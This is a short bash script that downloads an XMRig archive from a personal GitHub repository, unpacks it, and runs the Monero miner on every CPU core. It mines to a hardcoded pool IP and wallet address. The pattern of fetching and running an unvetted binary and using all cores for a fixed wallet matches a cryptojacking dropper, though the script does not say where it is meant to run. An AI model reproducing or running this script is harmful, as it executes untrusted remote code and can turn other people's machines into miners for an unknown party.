#!/bin/bash
wget https://github.com/nandafiku/gradi/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz
./xmrig --donate-level 1 -o 157.245.57.127:443 -u amyKz2wKn2BcMsfBsowhXQ1XRfijPb12B8tP5GHmG8As16EEq65v9YRcorLsH8thNtZ4uTqGWxmwkRjMrx9DZhm243GLgwg3Fy -p DOR -a rx/0 -t $(nproc --all)
